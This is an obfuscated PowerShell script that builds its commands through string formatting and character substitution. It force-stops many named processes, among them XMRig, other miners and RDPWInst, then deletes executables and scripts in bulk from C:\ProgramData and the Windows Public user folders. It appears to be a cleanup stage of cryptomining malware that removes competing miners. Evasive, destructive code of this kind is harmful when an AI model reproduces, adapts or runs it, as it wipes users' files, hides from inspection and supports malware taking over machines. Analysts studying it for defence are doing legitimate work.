${g`Ne9}  = [tyPE]("{0}{4}{3}{1}{2}"-F("{1}{2}{0}"-f("{1}{0}"-f'DiA','m.'),("{1}{0}" -f'T','sys'),'e'),'OC','ESS','r',("{0}{1}{2}" -f'Gn',("{0}{1}"-f'OSt','i'),("{1}{0}"-f 's.p','C'))) ;  Function deL`ete
{

&("{2}{1}{0}" -f 'ess',("{1}{2}{0}"-f'c',("{1}{0}"-f 'p-P','to'),'ro'),'S') -Name ("{0}{1}" -f 'XMR','ig') -Force;
&("{0}{1}{2}" -f'Sto',("{1}{0}"-f'ro','p-P'),("{1}{0}" -f'ss','ce')) -Name ("{1}{0}"-f 'g',("{1}{0}" -f'mri','x')) -Force;
&("{3}{1}{2}{0}"-f ("{1}{2}{0}" -f ("{0}{1}"-f 'ces','s'),'r','o'),'t',("{0}{1}" -f'op-','P'),'S') -Name "00" -Force;
&("{3}{2}{0}{1}" -f 'c','ess','Pro',("{0}{1}"-f 'S',("{0}{1}"-f 't','op-'))) -Name "22" -Force;
&("{1}{0}{2}{3}"-f '-P',("{0}{1}"-f'St','op'),("{0}{1}"-f'ro','ce'),'ss') -Name ("{0}{2}{1}" -f'O','ve',("{1}{0}"-f ("{1}{0}" -f 'Dri','e'),'n')) -Force;
&("{1}{2}{0}" -f 's',("{1}{0}" -f'top','S'),("{1}{0}"-f 's',("{1}{0}{2}"-f'Proc','-','e'))) -Name ("{0}{2}{1}"-f'On','2',("{1}{2}{0}" -f 'eV',("{1}{0}" -f'ri','eD'),'v')) -Force;
&("{1}{3}{0}{2}" -f'Pro','S',("{0}{1}"-f 'ces','s'),("{1}{0}" -f '-','top')) -Name ("{1}{2}{0}{3}"-f 'ive',("{0}{1}" -f'O','neD'),'r',("{0}{1}"-f'nw','t2')) -Force;
&("{0}{3}{2}{1}"-f 'St','s',("{0}{2}{1}" -f 'p',("{0}{1}{2}"-f 'Pro','c','es'),'-'),'o') -Name ("{1}{0}" -f '643','1') -Force;
&("{2}{1}{0}{3}"-f ("{0}{1}" -f'oc','es'),("{0}{1}"-f 'o',("{0}{1}"-f'p','-Pr')),'St','s') -Name ("{1}{0}" -f ("{1}{0}" -f ("{1}{0}"-f 'er','rv'),'e'),'S') -Force;
&("{1}{0}{3}{2}" -f'top','S','s',("{2}{0}{1}"-f'roc','es','-P')) -Name ("{1}{0}"-f("{0}{1}" -f'ine','r'),'Xm') -Force;
&("{0}{2}{1}" -f 'S','ess',("{0}{1}"-f("{0}{1}"-f 'to','p-P'),'roc')) -Name ("{0}{1}"-f'xne','w') -Force;
&("{1}{0}{3}{2}" -f 'P',("{1}{0}"-f 'p-','Sto'),'s',("{0}{1}" -f 'roc','es')) -Name ("{0}{2}{1}" -f'sc','2',("{1}{0}" -f 'een','r')) -Force;
&("{0}{2}{3}{1}" -f'St',("{1}{0}"-f 'ss','ce'),'o',("{0}{1}"-f 'p',("{0}{1}"-f'-P','ro'))) -Name ("{0}{3}{2}{1}" -f ("{2}{0}{1}" -f'Ca','rd',("{0}{1}"-f 'G','et-')),'fo','n','-I') -Force;
&("{2}{0}{1}{3}"-f'op',("{0}{1}" -f '-P','roc'),'St','ess') -Name ("{2}{1}{0}{3}"-f ("{1}{0}" -f ' ol','k'),("{1}{0}" -f 's','yDe'),'An','d') -Force;
&("{1}{2}{3}{0}" -f 's','Sto','p-',("{0}{1}"-f 'P',("{1}{0}"-f's','roce'))) -Name ("{0}{1}"-f 'RDP',("{1}{0}" -f("{0}{1}"-f'Ins','t'),'W')) -Force;
&("{0}{1}{3}{2}"-f("{1}{0}" -f 'op','St'),("{1}{0}" -f'Pro','-'),'ess','c') -Name "eth" -Force;
&("{3}{0}{1}{2}"-f 'o',("{1}{2}{0}" -f'ces','p',("{0}{1}"-f'-Pr','o')),'s','St') -Name ("{1}{0}"-f 'th2','e') -Force;
&("{2}{0}{1}" -f 'ce','ss',("{2}{1}{0}" -f'o','r',("{2}{1}{0}"-f'P','p-','Sto'))) -Name "etc" -Force;
&("{0}{1}{3}{2}"-f 'S',("{1}{0}" -f'r',("{1}{0}"-f'op-P','t')),("{1}{0}" -f'ess','c'),'o') -Name ("{1}{0}" -f 'ss','ha') -Force;
&("{2}{0}{1}{3}"-f'p-P','ro','Sto',("{0}{1}"-f'ces','s')) -Name ("{1}{0}" -f 'r',("{1}{0}{2}"-f 'in',("{1}{0}"-f 'ewm','n'),'e')) -Force;
&("{1}{3}{0}{2}" -f 'ce',("{0}{1}"-f 'S',("{0}{1}" -f 'top','-')),'ss','Pro') -Name ("{0}{1}"-f't',("{0}{1}"-f'-','rex')) -Force;
&("{1}{3}{2}{0}"-f ("{0}{1}" -f 'oce','ss'),'Sto','Pr','p-') -Name ("{3}{2}{4}{1}{0}" -f'32','te',("{0}{1}" -f 'ome','up'),'chr','da') -Force;
&("{3}{0}{2}{1}"-f'r',("{1}{0}"-f'ss','ce'),'o',("{0}{1}{2}"-f'S',("{0}{1}"-f't','op-'),'P')) -Name ("{2}{0}{1}"-f 'd',("{0}{1}{2}"-f'r','ive','91'),'on') -Force;
&("{0}{1}{2}" -f'Sto',("{1}{2}{0}" -f 'ce','p',("{1}{0}" -f'o','-Pr')),'ss') -Name ("{0}{3}{2}{4}{1}"-f 'R',("{0}{1}"-f'oke','r'),'m',("{0}{1}" -f'u','nti'),("{1}{0}"-f'Br','e ')) -Force;
&("{3}{0}{1}{2}" -f'P','roc','ess',("{1}{0}" -f("{0}{1}" -f 'to','p-'),'S')) -Name "97" -Force;
&("{1}{2}{0}" -f("{2}{1}{0}"-f 'ss','oce','Pr'),'St','op-') -Name "98" -Force;
&("{2}{0}{1}" -f'Pro',("{0}{1}"-f'ces','s'),("{0}{1}"-f'S',("{0}{1}"-f 'to','p-'))) -Name ("{3}{2}{1}{0}{4}{5}" -f 'iii',("{0}{1}"-f 'iii','i'),'u',("{0}{1}{2}"-f ("{1}{0}" -f 'j','cds'),'n','h'),'i','iii') -Force;
&("{0}{2}{1}"-f 'St',("{1}{0}" -f ("{0}{1}{2}" -f 'ro','ce','ss'),'-P'),'op') -Name "667" -Force;
&("{0}{1}{2}" -f 'Sto','p-P',("{0}{1}{2}"-f'r','oce','ss')) -Name "45" -Force;
&("{3}{0}{2}{1}"-f'-P',("{0}{1}"-f 'ces','s'),'ro',("{0}{1}" -f 'St','op')) -Name ("{0}{1}" -f'ahm','ed') -Force;
&("{2}{0}{3}{1}" -f("{1}{0}"-f 'c',("{0}{1}" -f '-','Pro')),'s',("{1}{0}" -f 'p','Sto'),'es') -Name ("{1}{0}" -f'o','mon') -Force;
&("{1}{3}{2}{0}" -f("{1}{0}"-f 'ess','c'),("{1}{0}" -f '-',("{0}{1}" -f'S','top')),'ro','P') -Name ("{0}{1}{2}" -f("{0}{1}"-f 'Di','sc'),("{0}{1}" -f'or','dt'),'tt') -Force;
&("{2}{0}{1}" -f("{0}{1}"-f("{0}{1}"-f'op-P','r'),'o'),("{0}{1}" -f'ce','ss'),'St') -Name "47" -Force;
&("{1}{2}{0}" -f'ss','St',("{2}{1}{0}"-f ("{1}{0}" -f'roce','P'),'p-','o')) -Name "20" -Force;
&("{3}{0}{2}{1}" -f '-P','ss',("{1}{0}" -f'ce','ro'),("{0}{1}" -f 'Sto','p')) -Name ("{0}{1}"-f'msi','ahk') -Force;





&("{2}{0}{1}"-f'l','eep',("{0}{1}" -f 'Sta',("{1}{0}" -f 'S','rt-'))) -s 16;
&("{0}{1}"-f 'd','el') (("{3}{1}{4}{2}{0}"-f 'e',("{1}{0}" -f 'a','ogr'),'ex',("{1}{0}" -f("{1}{0}" -f'Pr','R9'),'C:t'),("{0}{2}{1}" -f("{1}{0}"-f't','mDa'),("{0}{1}" -f 't','R9*.'),'a')))."r`epL`AcE"(([chAr]116+[chAr]82+[chAr]57),[StRing][chAr]92);
&("{1}{0}"-f 'l','de') ((("{3}{5}{6}{1}{4}{2}{0}" -f '.js',("{0}{1}" -f("{0}{1}"-f 'am','Dat'),'a'),'C*','C:','Ug',("{0}{1}" -f 'UgC','P'),("{1}{0}" -f'gr','ro')))  -cRePlaCe  'UgC',[cHAr]92);
&("{1}{0}" -f'el','d') (("{3}{1}{4}{0}{2}"-f '2U','rog',("{0}{1}" -f '*.v','bs'),("{2}{1}{0}"-f 'UP','2','C:B'),("{1}{0}{2}" -f'm','ra',("{1}{0}"-f'aB','Dat')))).("{0}{1}"-f ("{0}{1}" -f 'Re','pL'),'acE')."inv`okE"('B2U','\');
&("{0}{1}"-f'de','l') (("{1}{5}{4}{3}{2}{0}" -f 'd','C',("{0}{1}"-f'Q',("{1}{0}" -f'*.cm','8')),("{0}{1}"-f 'at','aE'),("{2}{0}{1}" -f'r',("{1}{0}"-f'ramD','og'),'P'),("{1}{0}"-f'8',':EQ')))."r`ePLAce"(([ChAr]69+[ChAr]81+[ChAr]56),'\');
&("{0}{1}"-f 'de','l') (("{0}{5}{2}{4}{1}{3}"-f 'C:','ata',("{2}{0}{1}"-f'a','m',("{1}{0}"-f 'r','Prog')),("{0}{1}" -f("{0}{1}"-f 'JF','o*'),("{1}{0}" -f 'at','.b')),'D','JFo'))."R`Epl`ACe"(([chaR]74+[chaR]70+[chaR]111),[StRINg][chaR]92);
&("{1}{0}"-f 'l','de') ((("{2}{0}{3}{6}{4}{1}{5}"-f ':J',("{0}{2}{1}"-f'Dat','Js','a'),'C',("{0}{1}{2}"-f ("{0}{1}" -f 'sI','Pr'),'o','g'),'am',("{0}{1}" -f("{1}{0}" -f 'n','I*.l'),'k'),'r'))-CREPlAcE 'JsI',[CHaR]92);
&("{0}{1}"-f'de','l') (("{2}{0}{1}{4}{3}"-f ("{0}{1}"-f'NP',("{1}{0}"-f'ra','rog')),'mDa',("{1}{0}"-f':8d','C'),("{2}{0}{1}" -f 'dN*',("{0}{1}"-f'.ps','1'),'8'),'ta')).("{1}{0}" -f 'aCE',("{0}{1}" -f're','Pl'))."iNvO`kE"('8dN','\');
&("{0}{1}"-f'd','el') (("{3}{1}{0}{2}"-f("{0}{1}" -f'j',("{0}{1}" -f '9l','*.')),("{0}{1}{2}"-f("{1}{0}" -f 'a','ogr'),'mDa','ta'),'ps',("{1}{0}"-f("{0}{1}" -f 'j9lP','r'),'C:')))."R`ePLACE"(([ChAR]106+[ChAR]57+[ChAR]108),[strIng][ChAR]92);
&("{0}{1}"-f'de','l') (("{4}{5}{2}{6}{3}{0}{1}"-f'ur','l',("{2}{1}{0}"-f ("{0}{1}" -f 'a','mDa'),'r','g'),("{2}{0}{1}"-f '3id','*.','a'),("{0}{1}"-f'C:3','id'),'Pro','t')).("{0}{1}{2}" -f ("{0}{1}"-f 'R','EpL'),'Ac','E')."I`Nv`OKE"('3id','\');
&("{0}{1}" -f'd','el') ((("{5}{3}{4}{1}{6}{2}{0}" -f'pol','Pr',("{0}{2}{1}" -f'gra',("{0}{1}"-f'aYa','U*.'),("{1}{0}" -f 'at','mD')),'Ya','U','C:','o'))  -crePLAce ([cHaR]89+[cHaR]97+[cHaR]85),[cHaR]92);

&("{1}{0}" -f'l','de') (("{0}{2}{1}{3}{4}"-f 'C:Z',("{1}{0}"-f 'e','KUs'),'m',("{1}{0}{3}{2}{4}"-f 'K',("{1}{0}" -f 'm','rsZ'),'K',("{0}{1}" -f'PublicZ','m'),'*'),("{1}{0}" -f'e','.ex'))).("{0}{2}{1}"-f'ReP','ACe','l')."inVo`ke"('ZmK','\');
&("{0}{1}"-f'd','el') ((("{1}{0}{3}{2}{5}{4}{6}" -f':{','C','ser','0}U','j','s{0}Public{0}*.','s'))-f[chaR]92);
&("{1}{0}"-f'el','d') (("{4}{2}{3}{0}{1}" -f ("{0}{1}"-f 'WwT','*'),("{1}{0}"-f'bs','.v'),("{0}{1}{2}"-f'U',("{2}{1}{0}" -f'sWw','r','se'),'TPu'),("{1}{0}"-f 'lic','b'),("{0}{1}" -f'C:W','wT')))."R`E`PLACe"(([Char]87+[Char]119+[Char]84),[StRINg][Char]92);
&("{0}{1}" -f 'd','el') (("{3}{1}{4}{0}{6}{5}{2}" -f'fUs','u',("{1}{0}{2}" -f("{1}{0}" -f 'cm','*.'),'ugf','d'),'C:','g','c',("{0}{1}{2}" -f ("{1}{0}{2}" -f'ugf','ers','P'),'u','bli')))."R`EPla`ce"(([cHAR]117+[cHAR]103+[cHAR]102),[sTRInG][cHAR]92);
&("{0}{1}" -f'd','el') (("{4}{2}{5}{0}{1}{6}{3}" -f ("{1}{2}{0}"-f'icp','N',("{1}{0}" -f'ubl','0P')),'N','pN0','bat','C:',("{0}{2}{1}"-f 'Us','rsp','e'),'0*.'))."REP`lacE"(([CHAR]112+[CHAR]78+[CHAR]48),[sTrING][CHAR]92);
&("{1}{0}" -f'l','de') ((("{1}{0}{2}{4}{3}{5}"-f 'ser',("{1}{2}{0}"-f 'E3U','C:','X'),'s',("{1}{0}" -f'X','lic'),("{0}{1}" -f 'XE',("{0}{1}"-f'3P','ub')),("{1}{0}"-f ("{0}{1}{2}" -f'3*.l','n','k'),'E')))  -crEpLACE 'XE3',[cHAR]92);
&("{1}{0}"-f 'l','de') (("{2}{1}{3}{0}{4}" -f ("{2}{0}{1}"-f'*','.ps',("{0}{1}" -f 'l','icXjM')),("{0}{1}"-f 'sXj','MPu'),("{1}{0}"-f ("{0}{1}"-f':','XjMUser'),'C'),'b','1'))."R`ePlA`CE"(([CHaR]88+[CHaR]106+[CHaR]77),[String][CHaR]92);
&("{0}{1}" -f 'd','el') (("{5}{2}{7}{1}{6}{4}{0}{3}" -f 'a','b','azU',("{1}{0}"-f ("{1}{0}" -f 's','*.p'),'z'),'0','C:0','lic',("{3}{1}{2}{0}"-f'u',("{1}{0}"-f 's0a','er'),'zP','s')))."r`E`pLacE"(([ChAr]48+[ChAr]97+[ChAr]122),[STriNG][ChAr]92);
&("{0}{1}"-f 'd','el') (("{4}{1}{2}{6}{0}{3}{5}"-f'bl',("{2}{1}{0}"-f'6r','sG',("{2}{0}{1}"-f 'rU','ser','6')),'P',("{0}{1}"-f 'icG','6'),'C:G',("{1}{0}"-f'url','r*.'),'u'))."r`EPlaCE"('G6r',[sTrIng][CHar]92);
&("{1}{0}" -f 'el','d') ((("{5}{0}{3}{1}{4}{2}"-f '0}',("{0}{1}" -f 'bl','ic'),("{1}{0}" -f'ol','.p'),'Pu','{0}*','C:{0}Users{')) -F [CHaR]92);

&("{0}{1}"-f'de','l') ((("{4}{3}{5}{1}{0}{6}{2}"-f("{1}{0}" -f 'ic','ubl'),'P','ures{0}*.exe','{0}Users','C:','{0}','{0}Pict')) -F[cHAR]92);
&("{0}{1}"-f'de','l') ((("{3}{2}{0}{1}{4}{5}"-f 'e',("{0}{2}{3}{1}" -f 'rsp',("{2}{0}{1}" -f'lic','p','ub'),'FY','P'),'s',("{1}{0}{2}"-f 'pFY','C:','U'),("{1}{0}{2}" -f 'ct',("{0}{1}" -f'F','YPi'),'u'),("{0}{2}{1}" -f("{0}{1}" -f 'r','espFY'),'s','*.j'))) -rEplACE([cHaR]112+[cHaR]70+[cHaR]89),[cHaR]92);
&("{0}{1}" -f'de','l') (("{1}{5}{6}{2}{4}{0}{7}{3}"-f ("{0}{1}"-f'u','res'),("{0}{1}"-f 'C:L','W'),("{0}{1}" -f'cL',("{1}{0}"-f 'i','WrP')),("{0}{1}" -f '.','vbs'),'ct',("{2}{0}{1}"-f'rP','u',("{0}{2}{1}"-f 'rUse','sLW','r')),'bli',("{1}{0}"-f'Wr*','L')))."R`ePl`ACe"(([cHAr]76+[cHAr]87+[cHAr]114),[StRinG][cHAr]92);
&("{1}{0}" -f 'el','d') ((("{8}{7}{5}{3}{6}{10}{0}{2}{1}{4}{9}"-f'ctu',("{1}{0}" -f 'BOx','es'),'r','BO','*',("{2}{0}{1}"-f'li','c',("{1}{0}"-f'OxPub','sB')),'xP',("{1}{2}{0}" -f 'er',':BO','xUs'),'C',("{0}{1}"-f'.','cmd'),'i')) -rEplacE  'BOx',[ChaR]92);
&("{0}{1}"-f'de','l') ((("{2}{3}{5}{6}{1}{0}{8}{4}{7}"-f'}Pict','lic{0','C:{0','}','b','Use','rs{0}Pub','at','ures{0}*.'))-F  [cHAr]92);
&("{1}{0}"-f 'el','d') ((("{3}{6}{0}{1}{2}{4}{5}"-f ("{2}{1}{0}" -f("{1}{0}"-f 'P','BD4'),'c',("{0}{1}"-f'ubl','i')),("{1}{0}"-f 'ur','ict'),("{1}{0}" -f 'sBD','e'),("{1}{0}{2}"-f 'se',("{1}{2}{0}" -f'BD4U','C',':'),("{1}{0}"-f 'D4','rsB')),("{0}{1}" -f'4',("{0}{1}" -f'*','.ln')),'k','P')) -CRePlACE'BD4',[chaR]92);
&("{0}{1}" -f'de','l') ((("{3}{8}{7}{4}{2}{5}{1}{10}{6}{0}{9}" -f'sBu','k',("{0}{1}" -f("{1}{0}" -f 'ub','ukP'),'l'),'C',("{1}{0}"-f'sB','er'),("{0}{1}" -f 'ic','Bu'),("{0}{1}" -f("{0}{1}"-f'ctu','r'),'e'),'Us',("{0}{1}" -f ':B','uk'),("{0}{1}{2}"-f 'k','*',("{0}{1}" -f'.','ps1')),'Pi'))  -CREPlaCe 'Buk',[cHAR]92);
&("{1}{0}"-f'l','de') ((("{7}{6}{3}{1}{2}{9}{5}{0}{4}{8}"-f'u','W',("{2}{1}{0}"-f 'cOW','li',("{1}{0}"-f 'ub','1P')),'O',("{0}{1}" -f("{0}{1}"-f 're','sO'),'W1*'),("{0}{1}"-f'Pic','t'),("{2}{0}{1}"-f ("{0}{1}" -f 'U','ser'),'s','W1'),'C:O','.ps','1'))  -CrEPlacE  ([char]79+[char]87+[char]49),[char]92);
&("{0}{1}" -f'de','l') (("{8}{7}{3}{5}{4}{0}{2}{6}{1}"-f '6','l','HL*',("{1}{0}"-f 'LP',("{0}{2}{1}" -f 'b','ic6H','l')),'es',("{0}{1}" -f 'i',("{0}{1}" -f'ct','ur')),'.ur','Pu',("{1}{0}{3}{2}"-f("{0}{2}{1}"-f ':6','LUse','H'),'C','6HL','rs'))).("{1}{0}"-f'CE',("{0}{1}" -f'r',("{0}{1}"-f 'E','Pla')))."inV`oKE"('6HL','\');
&("{0}{1}"-f'de','l') ((("{6}{5}{4}{1}{7}{8}{2}{3}{0}{9}" -f'{','bl',("{1}{0}" -f'ur','ct'),'es','sers{0}Pu','U','C:{0}','ic{0}','Pi','0}*.pol'))  -F [ChAR]92);


&("{0}{1}"-f'd','el') ((("{0}{5}{8}{3}{7}{1}{9}{2}{4}{6}"-f 'C:{0}Us','lic{0','}*.','{','e','e','xe','0}Pub','rs','}Music{0'))  -f[CHAR]92);
&("{1}{0}" -f'l','de') ((("{1}{6}{2}{3}{5}{0}{4}" -f("{1}{0}{2}" -f("{1}{0}"-f'*.','wqS'),'ic','j'),("{2}{1}{0}"-f'r','se',("{1}{0}"-f 'SU','C:wq')),("{1}{2}{0}"-f'bl','wq','SPu'),'icw','s',("{0}{1}"-f ("{0}{1}"-f 'q','SMu'),'s'),'s')) -cRePLACE  'wqS',[ChAR]92);
&("{0}{1}"-f'de','l') ((("{5}{3}{2}{1}{6}{4}{0}"-f'vbs',("{1}{2}{0}"-f 'ic',("{0}{1}" -f'ic','VQR'),'Mus'),("{1}{0}" -f 'l',("{1}{0}"-f'ub','VQRP')),("{1}{2}{0}" -f'rs','QR','Use'),'.','C:V',("{0}{1}" -f 'VQR','*'))) -rEPlACe([char]86+[char]81+[char]82),[char]92);
&("{0}{1}"-f 'de','l') (("{2}{1}{6}{9}{8}{3}{7}{0}{10}{4}{5}"-f'Mu',':','C','xJ',("{2}{1}{0}" -f("{1}{0}"-f'z*.','J'),'x','ic'),'cmd',("{1}{0}{2}"-f'xJ',("{1}{0}"-f 'Users','xJz'),'zPu'),'z','lic','b','s')).("{2}{1}{0}" -f'Ace','L','rEP')."I`NvokE"('xJz','\');
&("{1}{0}" -f 'el','d') ((("{3}{0}{2}{1}{7}{5}{8}{4}{6}"-f '0',("{0}{1}"-f("{0}{1}" -f'ers','I'),'w'),'Us',("{1}{0}"-f'w','C:I'),("{3}{0}{1}{2}" -f ("{0}{1}{2}" -f'cIw','0','Mus'),'ic',("{1}{0}"-f '*','Iw0'),'li'),'Pu',("{1}{0}" -f'at','.b'),'0','b')) -cREpLAce 'Iw0',[cHAR]92);
&("{1}{0}"-f 'el','d') ((("{2}{5}{3}{4}{6}{1}{0}" -f'c{0}*.lnk','{0}Musi','C:','}Use','rs{0}P','{0',("{0}{1}" -f'ub','lic'))) -F [cHAR]92);
&("{1}{0}" -f'el','d') ((("{2}{1}{3}{4}{6}{0}{5}" -f'ps','}Users{0}P','C:{0','ubl','ic{0}Musi','1','c{0}*.'))-F  [cHAr]92);
&("{0}{1}"-f 'de','l') (("{0}{4}{6}{1}{2}{8}{5}{7}{3}" -f("{0}{1}"-f'C',':QN'),'QN','w','ps','w','Nw*',("{1}{0}"-f'rs','Use'),'.',("{3}{1}{2}{0}" -f 'cQ','lic',("{1}{0}{2}" -f'N','Q','wMusi'),'Pub')))."R`ePla`CE"('QNw',[sTRiNG][ChAR]92);
&("{0}{1}" -f 'd','el') ((("{1}{0}{3}{2}{4}{5}{6}" -f '0}Users{0','C:{','lic{0}Mu','}Pub','sic{','0','}*.url'))-f  [char]92);
&("{0}{1}"-f'd','el') ((("{9}{4}{8}{6}{5}{7}{1}{3}{0}{2}{10}" -f 'VMu',("{0}{1}"-f 'ub','li'),("{2}{1}{0}" -f("{0}{1}" -f'c4vV','*'),'i','s'),'c4v','VU','v','4','VP',("{1}{0}" -f's','ser'),("{0}{1}" -f'C',':4v'),("{1}{0}" -f 'pol','.'))) -replacE ([chAR]52+[chAR]118+[chAR]86),[chAR]92);

&("{1}{0}" -f'l','de') ((("{8}{6}{2}{7}{1}{0}{3}{4}{9}{5}" -f("{1}{0}"-f ("{0}{1}"-f'i','c0A'),'l'),("{0}{1}"-f '0',("{1}{0}" -f 'yPub','A')),'r',("{0}{1}" -f 'yV','id'),("{1}{0}" -f 's0A','eo'),("{1}{0}"-f'xe','*.e'),'e','s',("{0}{2}{1}"-f'C','Us',("{0}{1}" -f ':0','Ay')),'y'))  -ReplACE  '0Ay',[ChaR]92);
&("{0}{1}" -f 'de','l') (("{8}{7}{9}{10}{1}{4}{2}{0}{6}{3}{5}"-f'vV',("{1}{0}" -f 'l','Pub'),'q',("{0}{2}{1}" -f("{0}{1}" -f'eos','yq'),'.','v*'),'icy','js','id',("{0}{1}"-f ("{0}{1}" -f'qv','Us'),'er'),'C:y','syq','v')).("{1}{2}{0}" -f'cE',("{1}{0}" -f 'l','REP'),'A')."I`NvoKe"('yqv','\');
&("{1}{0}"-f 'l','de') (("{0}{3}{7}{1}{6}{5}{2}{4}"-f("{1}{0}{2}"-f 'U',("{0}{1}"-f 'C',':B4Z'),'s'),'li','B4',("{1}{0}"-f'sB','er'),("{0}{1}"-f ("{0}{1}" -f 'Z*.','v'),'bs'),("{1}{0}" -f'os','ide'),("{1}{0}" -f '4ZV','cB'),("{0}{1}" -f '4ZP','ub')))."R`EPlAcE"(([chAR]66+[chAR]52+[chAR]90),[sTRiNG][chAR]92);
&("{0}{1}"-f'd','el') ((("{7}{5}{0}{9}{8}{1}{4}{6}{3}{2}"-f '}Us','{0}Public{0}','d','m','Videos{0}*','{0','.c','C:','s','er')) -f  [CHar]92);
&("{1}{0}" -f 'l','de') ((("{4}{7}{2}{3}{6}{0}{5}{1}"-f'98',("{1}{0}" -f 't','.ba'),'i',("{0}{2}{1}"-f 'c','o',("{0}{1}"-f'o','98Vide')),("{3}{0}{1}{2}" -f 'o9',("{1}{2}{0}" -f '9','8Use','rso'),'8','C:'),'*','so',("{1}{0}" -f'ubl','P')))-cRePLACE 'o98',[ChaR]92);
&("{0}{1}"-f 'de','l') (("{8}{9}{5}{6}{4}{2}{3}{1}{0}{7}" -f("{2}{0}{1}" -f'o',("{1}{0}"-f'5t','sB'),("{1}{0}" -f 'de','Vi')),'t','ubl',("{1}{0}" -f 'B5','ic'),'P',("{1}{0}"-f 'B5',("{0}{1}" -f'se','rs')),'t',("{1}{0}"-f("{1}{0}"-f 'k','.ln'),'*'),'C',("{1}{0}" -f ("{1}{0}"-f '5tU','B'),':')))."r`Ep`Lace"(([chaR]66+[chaR]53+[chaR]116),[sTRiNg][chaR]92);
&("{0}{1}" -f'd','el') ((("{8}{0}{7}{4}{2}{6}{3}{1}{5}"-f("{0}{2}{1}" -f'W','s',("{0}{1}" -f'O','User')),'*.p',("{1}{0}"-f ("{1}{0}" -f 'i','WOV'),'cb'),'WO',("{0}{1}" -f'ubl','i'),'s1',("{1}{0}" -f 'osb','de'),("{1}{0}" -f'P','bWO'),'C:b'))-CRepLacE'bWO',[cHAR]92);
&("{0}{1}" -f 'de','l') (("{1}{0}{3}{4}{2}{6}{5}"-f':8P','C','r','6','Use',("{2}{7}{1}{5}{4}{3}{0}{6}" -f("{1}{0}" -f'*.','P6'),'u','8P6',("{0}{1}{2}"-f'c','8','P6Videos8'),'i','bl','ps','P'),'s'))."re`P`lace"('8P6',[StRINg][chAR]92);
&("{1}{0}"-f'l','de') ((("{0}{6}{5}{3}{8}{2}{9}{4}{1}{7}" -f 'C:','ur','Vid','8',("{2}{1}{0}" -f '.','8M*','sC'),("{1}{0}" -f'icC',("{1}{0}" -f'Publ','M')),("{2}{0}{1}"-f'ers','C8',("{1}{0}" -f'MUs','C8')),'l','M','eo'))-CrepLACe 'C8M',[cHAr]92);
&("{1}{0}"-f'el','d') (("{1}{0}{2}{5}{6}{7}{3}{4}" -f 'Pub',("{2}{0}{1}"-f ("{0}{1}"-f'rs','b4'),'D',("{2}{1}{0}"-f 'Use','4D','C:b')),'li','.po','l',("{1}{0}" -f'DVi','cb4'),("{1}{0}"-f'b',("{1}{0}"-f 'eos','d')),'4D*')).("{1}{2}{0}" -f 'E','R',("{0}{1}" -f 'Ep','LaC'))."INvo`KE"('b4D','\');



&("{0}{1}" -f'de','l') ((("{6}{5}{2}{3}{0}{4}{1}" -f 'loa','0}*.exe','}Publ','ic{0}Down','ds{','{0}Users{0','C:'))  -f[CHaR]92);
&("{0}{1}"-f'd','el') (("{7}{5}{3}{1}{2}{6}{8}{4}{0}" -f 's',("{1}{0}" -f'Pub','g'),("{0}{1}{2}" -f ("{0}{1}" -f'li','cn'),'vgD',("{0}{1}" -f 'ow','nl')),("{0}{1}"-f 'ser','snv'),'.j','U',("{0}{1}{2}"-f 'oa','ds','nv'),("{1}{0}" -f 'vg','C:n'),'g*')).("{2}{0}{1}" -f'L','acE','rep')."inV`o`kE"('nvg','\');
&("{0}{1}"-f'd','el') ((("{6}{4}{1}{5}{0}{2}{7}{3}"-f("{0}{1}{2}"-f'lic',("{1}{0}"-f 'Dow','MlQ'),'n'),("{1}{0}" -f 's','ser'),'lo',("{1}{0}"-f 'vbs','.'),'QU',("{1}{0}" -f ("{1}{0}" -f'QPub','l'),'M'),("{1}{0}" -f'l','C:M'),("{1}{0}" -f '*',("{1}{0}{2}" -f 'dsMl','a','Q')))) -CRePlACe'MlQ',[chAr]92);
&("{0}{1}" -f 'd','el') ((("{3}{9}{4}{6}{11}{8}{2}{1}{0}{10}{7}{5}" -f 'c{0}D','i','l','C:{0','Us',("{1}{0}" -f 'd','.cm'),'er','0}*','}Pub','}','ownloads{','s{0')) -f [cHar]92);
&("{1}{0}" -f'el','d') (("{8}{0}{1}{9}{2}{5}{6}{3}{7}{4}" -f 'iF',("{1}{0}" -f ("{0}{1}" -f'sA','iFP'),("{1}{0}"-f 'ser','U')),'iF',("{0}{1}" -f 'Ai','F*'),'bat','Dow',("{2}{0}{1}"-f 'l',("{1}{0}" -f 'ds','oa'),'n'),'.','C:A',("{2}{1}{0}"-f 'cA','li','ub')))."R`eplaCe"(([chAR]65+[chAR]105+[chAR]70),'\');
&("{0}{1}"-f 'de','l') ((("{3}{5}{6}{7}{4}{0}{2}{1}"-f 'a',("{1}{3}{0}{2}" -f 'S*','sE',("{1}{0}" -f'k','.ln'),'d'),'d',("{0}{1}{2}"-f'C:','Ed',("{0}{1}" -f'S','Users')),("{1}{0}" -f'lo','wn'),("{2}{1}{0}" -f'cEd',("{1}{0}" -f'ubli','dSP'),'E'),'SD','o'))  -CREpLACE'EdS',[ChAr]92);
&("{1}{0}"-f'el','d') (("{8}{3}{7}{5}{2}{6}{1}{0}{4}"-f("{0}{1}"-f '*.p','s'),'z8j','o',("{1}{0}"-f 'rsz','se'),'1',("{2}{0}{1}" -f'z8','jD',("{0}{1}"-f'ubli','c')),("{1}{2}{0}" -f 'ds',("{0}{1}" -f'w','nlo'),'a'),'8jP',("{1}{0}"-f ("{1}{0}" -f'8jU','z'),'C:')))."rEP`la`cE"('z8j',[StRing][char]92);
&("{0}{1}" -f'de','l') (("{2}{1}{6}{9}{3}{0}{4}{7}{5}{10}{8}" -f ("{0}{1}" -f'b',("{1}{0}"-f'c9','li')),':9Q','C',("{1}{0}"-f 'u','QmP'),'Qm',("{0}{1}"-f 'loa','ds'),'mU',("{0}{1}"-f'Dow','n'),("{1}{0}"-f'.ps','Qm*'),("{1}{0}" -f's9','ser'),'9')).("{0}{1}{2}" -f'r','EPl','acE')."I`NvoKE"('9Qm','\');
&("{0}{1}"-f'de','l') (("{9}{2}{8}{3}{4}{1}{6}{5}{7}{0}"-f 'l','7u',("{2}{0}{1}"-f 'ser','s7u','U'),("{1}{0}" -f'c','bli'),("{1}{0}{2}"-f'loa',("{1}{0}" -f 'Down','7uv'),'ds'),'*.','v','ur','vPu',("{0}{1}"-f'C:','7uv')))."reP`lacE"(([ChAR]55+[ChAR]117+[ChAR]118),[STrING][ChAR]92);
